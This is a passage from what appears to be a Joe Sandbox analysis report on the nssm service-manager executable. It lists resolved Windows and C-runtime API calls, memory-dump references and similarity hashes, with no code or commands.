                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7ecedcf817d275dc5114faf016ae541cbde4b1c114bfe29cb4ffe85fae9b08ca
                                                                                                                                                                                                                                  • Instruction ID: ffa53fb1cd3eb3c81639e5f8589c955f157f2e045acb7a7dcb614dd05e4cac4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ecedcf817d275dc5114faf016ae541cbde4b1c114bfe29cb4ffe85fae9b08ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4418176A04A80C2EB52AB66A4043DA67A1F78CBD4F584116FF4E4B7B8EF39C491C740
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: get_service_dependencies()$lpDependencies
                                                                                                                                                                                                                                  • API String ID: 0-219018013
                                                                                                                                                                                                                                  • Opcode ID: 623855cbe865ff38495d6d38c1390ee0e60366c3f386027245e09169f5bce92e
                                                                                                                                                                                                                                  • Instruction ID: 06c9f3ac3b4a9eddb45c762a59379cd4adef56995aaf5dbe4004fd673df64d93
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 623855cbe865ff38495d6d38c1390ee0e60366c3f386027245e09169f5bce92e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0851717660165486EB12DF66D4103AE73B0F74CBE8F848111EF89477A5EBBAC896C701
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 000000014001A8FB
                                                                                                                                                                                                                                    • Part of subcall function 000000014001A5D4: GetOEMCP.KERNEL32 ref: 000000014001A5FE
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018CA4: malloc.LIBCMT ref: 0000000140018CC3
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018CA4: Sleep.KERNEL32(?,?,00000000,0000000140019259,?,?,00000000,0000000140019303,?,?,?,?,?,?,00000000,000000014001AFD8), ref: 0000000140018CDA
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001A987
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018E1C: HeapFree.KERNEL32(?,?,00000000,000000014001AFEC,?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3), ref: 0000000140018E32
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018E1C: _errno.LIBCMT ref: 0000000140018E3C
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018E1C: GetLastError.KERNEL32(?,?,00000000,000000014001AFEC,?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3), ref: 0000000140018E44
                                                                                                                                                                                                                                  • _lock.LIBCMT ref: 000000014001A9BF
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001AA6F
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001AA9F
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 000000014001AAA4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2878544890-0
                                                                                                                                                                                                                                  • Opcode ID: cb335a60dd38f97e9d08f623b2068f8a9ea23dd3e952038bf2febff31a5c5bda
                                                                                                                                                                                                                                  • Instruction ID: 9dc04d1e585313a08d7e6cfb04ff8192f62cb0b4410e9ea1b7e38ca2d571acfc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb335a60dd38f97e9d08f623b2068f8a9ea23dd3e952038bf2febff31a5c5bda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9151603120068086E756DB6695403EAB7A1FB8ABD4F54831AFB5A4B3F6CB7EC841C711
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 233147e6c73d96668567181f4459e40a176476e617f07f6294ba23b53f059d58
                                                                                                                                                                                                                                  • Instruction ID: 22c40b51fe347eb5f5b7c36c7b414d3f0b1661fd08d5010e5805a7d7b557cc78
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 233147e6c73d96668567181f4459e40a176476e617f07f6294ba23b53f059d58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A317276204A8192EB15EB92F4413EAB361F7887D4F454416FB8907B66DF7CC986C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3,?,?,?,?,00000000,0000000140016E95), ref: 000000014001AF8A
                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3,?,?,?,?,00000000,0000000140016E95), ref: 000000014001AF98
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3,?,?,?,?,00000000,0000000140016E95), ref: 000000014001AFF0
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018D10: Sleep.KERNEL32(?,?,?,000000014001AFB3,?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3), ref: 0000000140018D55
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3,?,?,?,?,00000000,0000000140016E95), ref: 000000014001AFC4
                                                                                                                                                                                                                                  • free.LIBCMT ref: 000000014001AFE7
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 000000014001AFD8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3106088686-0
                                                                                                                                                                                                                                  • Opcode ID: ecf0b914a20b02aabfa25ee785d5aaca0e8471554d6feff85c3e01b07e8a1c82
                                                                                                                                                                                                                                  • Instruction ID: 1f2f838ea97328da921b377315d75801597c3e8df8c10df50db0ce1a7c79236b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecf0b914a20b02aabfa25ee785d5aaca0e8471554d6feff85c3e01b07e8a1c82
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01677460170192FB57AFA7E4547A862A1BB4DBE0F59463CFB16473F5EE3CC8458210
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LocalSystem
                                                                                                                                                                                                                                  • API String ID: 0-3718507506
                                                                                                                                                                                                                                  • Opcode ID: cb66d23384ea523946c2ca488a9fc18a879dc3e9374ffdb8c5dd246204467937
                                                                                                                                                                                                                                  • Instruction ID: 162cc021671df1666a2c8c15c16abf9d3ab729a54e193553e17657ce5f3623eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb66d23384ea523946c2ca488a9fc18a879dc3e9374ffdb8c5dd246204467937
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2451B831705B8081FA62DB37A8103DA66E1BB88BE4F584624BFA94B7F5DF39C801C700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %s
                                                                                                                                                                                                                                  • API String ID: 0-620797490
                                                                                                                                                                                                                                  • Opcode ID: c4bb9db80a02295544ffe1f11ad8f5968280475e82c95873c5b497f730137b7e
                                                                                                                                                                                                                                  • Instruction ID: f1adbe2389cf53ada790142032e87850e290ec5078126e90d56231e9fb5532c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4bb9db80a02295544ffe1f11ad8f5968280475e82c95873c5b497f730137b7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4519F72614B9086EB22DB62B8507DA6695F78DBD8F540125FF594BBE6CF39C881C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CreateErrorFileLastModuleNameTerminate
                                                                                                                                                                                                                                  • String ID: h
                                                                                                                                                                                                                                  • API String ID: 2250958926-2439710439
                                                                                                                                                                                                                                  • Opcode ID: df52f857e43061de1281b353b99c8c3ed50e2fdd787cb173e6475b91b8b63502
                                                                                                                                                                                                                                  • Instruction ID: 9eac3cfd04172872f19de6ee7fbdf67a314dd70718be91ac105000bd54c6eb7b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df52f857e43061de1281b353b99c8c3ed50e2fdd787cb173e6475b91b8b63502
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45215E72614A8086EB61DB65F84539EB3E4F78C384F904529B78E87A68DF7CC444CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1012874770-0
                                                                                                                                                                                                                                  • Opcode ID: 540e5c29297e961bf581663756246337d37c5d7fdf5c6fe070c29028da9bc07c
                                                                                                                                                                                                                                  • Instruction ID: 7147268b9de874ec318b534372e23c00eab7e6a39a3be2e6cb7bceb93055dadf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 540e5c29297e961bf581663756246337d37c5d7fdf5c6fe070c29028da9bc07c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F017D3220084092EA67EB53D5A63F42361AB8DBC4F580006BB0E8B9B6CF76DDA1D355
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KnownWell
                                                                                                                                                                                                                                  • String ID: LocalSystem$NT Authority\LocalService$NT Authority\NetworkService
                                                                                                                                                                                                                                  • API String ID: 2818491564-1933461649
                                                                                                                                                                                                                                  • Opcode ID: 7d9f4a24e188c06a6b440eee1b5648e502a1d512347348af97695d319474735c
                                                                                                                                                                                                                                  • Instruction ID: 9835354a13deee702d27c2f1c929ee2e9e44aa0ec15ec87958db99fd66a9cc44
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d9f4a24e188c06a6b440eee1b5648e502a1d512347348af97695d319474735c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF01D70B0460582FE16CBA3B8403E512949B8D791F8854249A0D477B1EE3CCDE5D714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 000000014001CAC1
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 000000014001CAD0
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 000000014001CB4D
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018D94: realloc.LIBCMT ref: 0000000140018DBF
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018D94: Sleep.KERNEL32(?,?,00000000,000000014001CB3D,?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 0000000140018DDB
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 000000014001CB5C
                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,?,?,000000014001CBA9,?,?,?,?,000000014001819E), ref: 000000014001CB68
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1310268301-0
                                                                                                                                                                                                                                  • Opcode ID: 1d41d2e714f9a986773e1bf90d311bff2662506bb7fa248c6a79a97b2838785a
                                                                                                                                                                                                                                  • Instruction ID: 5979fe72d117db4f475556634bd9f55f3cab34c691e7aeb4c67562cd919d0ce5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d41d2e714f9a986773e1bf90d311bff2662506bb7fa248c6a79a97b2838785a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13213C3131574480EA53AB63F9857D9B391B78E7C4F445825FB4E4F7B6DA7AD4828300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                                                                                  • Opcode ID: 63324935b110de257160fd5c66f1035e6a118d3cdae73a3397f7d3cf23960347
                                                                                                                                                                                                                                  • Instruction ID: 15eaba30044f1d8685e86891687cd03553b241fa16a1ea2a7b7b9098167d4962
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63324935b110de257160fd5c66f1035e6a118d3cdae73a3397f7d3cf23960347
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A114C76604B8082EB01AFA2A8447DA6761FB88BD5F444525FF8E4B774DE3DC8898A40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                                                                                  • Opcode ID: 959554682374d5807cc6ea112afb8f45880915832192883ee9d0f123f518be8a
                                                                                                                                                                                                                                  • Instruction ID: 7e3f34fe9eb536678a22250ffed7fdcdb9fd0d984d39a61c3fac17138bb95f81
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 959554682374d5807cc6ea112afb8f45880915832192883ee9d0f123f518be8a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1114C7660468092EB01ABA2A4043DA6761FB8CBD5F444526FF8A4B774DE3DC4898A40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Item$HeapText$_snwprintf_s$AllocProcess$FreeLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 65965981-0
                                                                                                                                                                                                                                  • Opcode ID: 77f495c016bf780c238b087ffd7838fa488e5ed8b296890d7e132bb2f6f165d1
                                                                                                                                                                                                                                  • Instruction ID: b86e961a99f4b038743e4140da226cdde426ad76304f40676bfd7e4297e767c6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77f495c016bf780c238b087ffd7838fa488e5ed8b296890d7e132bb2f6f165d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211E27172568152EB61DB42F5547EE6321E789BC4F801025FB4A17BA9CF7CC5468740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Item$HeapText$_snwprintf_s$AllocProcess$FreeLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 65965981-0
                                                                                                                                                                                                                                  • Opcode ID: e1d8e390221eb329989d1a71e2dcb206acabd1004bb65667421ba84b5d18a738
                                                                                                                                                                                                                                  • Instruction ID: 1084489e38216b3f315afbb6299b7814898179d2769d55a921bc9c56daf75f70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d8e390221eb329989d1a71e2dcb206acabd1004bb65667421ba84b5d18a738
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68111E7271968192EB66DB46F518BFE6321E789BC4F801021FE4A17FA5CF3CC64A8700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1445889803-0
